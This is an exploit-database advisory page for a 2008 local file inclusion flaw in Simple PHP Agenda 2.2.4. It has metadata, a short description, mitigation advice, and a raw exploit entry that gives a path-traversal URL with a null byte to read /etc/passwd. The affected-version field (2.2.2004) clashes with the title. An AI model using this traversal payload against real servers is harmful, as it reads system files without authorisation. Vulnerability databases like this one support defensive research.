Simple PHP Agenda - exploit.company

vendor:

Simple PHP Agenda

by:

StAkeR

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Simple PHP Agenda

Affected Version From: 2.2.2004

Affected Version To: 2.2.2004

Patch Exists: YES

Related CWE: N/A

CPE: a:simple_php_agenda:simple_php_agenda

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Simple PHP Agenda <= 2.2.4 Local File Inclusion Vulnerability

Simple PHP Agenda version 2.2.4 is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with a maliciously crafted 'page' parameter. This parameter can be used to include arbitrary files from the local system, such as '/etc/passwd'.

Mitigation:

Upgrade to the latest version of Simple PHP Agenda.

Source

Exploit-DB raw data:

@~~===========================================~~@
|  Author => StAkeR ~ StAkeR@hotmail.it         |  
@~~===========================================~~@ 
+                                                
@~~==========================================================================~~@
|  Simple PHP Agenda <= 2.2.4 Local File Inclusion Vulnerability               |
@~~==========================================================================~~@
|  index.php?page=../../../../../../../etc/passwd%00
@~~==========================================================================~~@
+
@~~=============================================================================~~@
|  http://dfn.dl.sourceforge.net/sourceforge/php-agenda/php-agenda-2.2.4.tar.gz   |
@~~=============================================================================~~@  

# milw0rm.com [2008-07-01]